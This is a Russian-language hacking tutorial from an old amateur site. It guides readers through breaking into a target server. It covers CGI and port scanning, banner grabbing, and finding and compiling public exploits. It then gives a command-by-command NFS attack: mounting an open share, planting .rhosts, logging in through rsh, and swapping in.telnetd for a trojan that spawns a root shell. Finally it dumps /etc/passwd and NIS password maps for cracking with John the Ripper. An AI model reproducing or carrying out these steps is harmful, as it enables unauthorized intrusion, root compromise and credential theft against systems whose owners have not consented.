http://HackSnake.narod.ru

C чего же всё таки начинать взлом сервера (сайта, странички и т.д.)

Итак, приступим! Первое с чего стоит начать это просканировать хост на стандартные CGi сценарии с помощью специальных сканеров которых слава богу сейчас предостаточно. Ну и что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО) на сегодняшний день-это DCS-D@mned Cgi Scanner предоставленный нам хак-группой D@mnedr, его можно скачать с йх официального сайта ( http://www.cc.f2s.com, еще правда есть сканер от группы Void (http://www.void.ru/) Но он немного уступает DCS по скорости сканирования. Ок, дальше, сканнер нашел уязвимый скрипт и вы спросите что же делать дальше???, а дальше вам надо найти то как использовать этот эксплоит, я дам вам несколько ссылок где можно найти описание этих ошибок:

http://qwerty.nanko.ru/ (наиболее полный но на Английском)
http://www.void.ru/
http://www.hack-crack.com/

или вы можете просто зайти на один из следующих сайтов и просто ввести уязвимый скрипт в строке поиска: http://www.packetstorm.securify.com/
http://www.securityfocus.com/
http://www.rootshell.com/ Второе и пожалуй главное - это сканирование портов, для сканирования можно использовать любой сканнер портов(какой - на ваш выбор их сейчас везде полно), но опять же хотел бы обратить ваше внимание на сканнер Nscan который можно скачать тут http://www.nscan.hypermart.net/, этот сканер обладает просто потрясающей скоростью сканирования и довольно просто в управлении(правда на сайте лежит Shareware версия которая будет работать только 30 дней)

После того как сканер нашел открытые порты вам надо приконнектиться к каждому и посмотреть какая версия программного обеспечения установлена на нём, делается это с помощью клиента TELNET который есть даже в Вынь95 (98,2000), в командной строке TELNET вы пишете: telnet>open www.target.com
и смотрите версию софта например: WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. После того как вы посмотрели версию вы должны найти эксплоит под эту версию, идете опять же на:

http://www.packetstorm.securify.com/
http://www.securityfocus.com/
http://www.technotronic.com/
и вводите в строке поиска название программы и его версию. После того как вы скачали эксплоит его как правило надо скомпилировать - то есть привести к рабочему состоянию (как правило) так как большинство серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд, то и компилировать его надо под этими системами. Если у вас нет установленного ЮНИКСА, то вам в любом случае (если хотите чего ни будь ломать нужен Юникс Шелл, то есть оболочка Юникс). Бесплатно её можно получить на http://www.nether.net/ и тому подобных серверах (введите на любом поисковике UNIX+SHELL+FREE) Когда шелл получен и эксплоит скачен то можно приступать к компилированию, обычно эксплоит (в большинстве случаев) это программа на языке С, для компиляции будем использовать компилятор GCC, итак в командной строке оболочки пишем: gcc -o exploit exploit.c и нижимаем Enter. Хочу так же заметить что программы в Юникс подобный системах запускаются с "./"+имя программы, в нашем случае эксплоит будет запускаться: >./exploit Третье, еще один довольно популярный взлом системы это проверка на расшаренные папки, в Юникс то можно проверить с помощью утилиты showmount, итак из оболочки запускаем showmount:
>showmount -e www.target.com
и видим /user/ Everyone или что-то другое но если есть Everyone то значит папка открыта на монтирование для всех
дальше пишем >mount -t nfs target.remote.com:/user /mnt потом переходми в каталог cd /mnt/home и устанавливаем .rhosts >echo www.target.com user/.rhosts дальше делаем следующее: >cat /etc/passwd
user::257:20::/: -смотрим пользователя и создаем такогоже у нас(если возможно) > su - user
! Становимся им$ rsh target.remote.com /bin/csh -i Warning! No access to terminal, job control disabled! ! И заходим на удаленную машину % id uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) % ls -ldg /usr/etc ! Каталог доступен на запись drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc % grep telnet /etc/inetd.conf telnet stream nowait root /usr/etc/in.telnetd in.telnetd ! Нашли программу, которая запустится !под root"ом из нашего каталога % cd /usr/etc % mv in.telnetd in.telnetd1 ! создаем троянского коня % cat in.telnetd >!/bin/sh exec /bin/csh -i
% chmod 755 in.telnetd ! и запускаем его % telnet 127.1 Connecting 127.1. Warning! No access to terminal, job control disabled! > chown user /etc; ! Делаем /etc своим : command not found > exit; : command not found Connection closed by foreign host. > cd /etc После того как у нас есть файл с паролями вы берете расшифровщик паролей Юникс - John The Ripper запускаете его и ждете пока расшифруются пароли потом из шелла коннектитесь на 23 порт и вводите логин с паролем и все вы в системе! И последнее на что я бы хотел обратить внимание в этой статье это проверка NIS сервера. Из облочки запускаем
>rpcinfo -p www.target.com | grep bind и если видим что-то типа 120000 2 udp 2493 ypbind То пробуем сдлать следующее: >ypx -o target.passwd -g target.remote.com

Берём файл с паролями и запускаем подборщик. На этом все!

Взято с ссайта: http://www.hackdocs.host.kz

Вверх

Назад              Вперёд

 

 || Главная страница || Статьи || Библиотека || Программы || Ссылки || Гостевая книга || Контакты || Авторам ||

Hosted by uCoz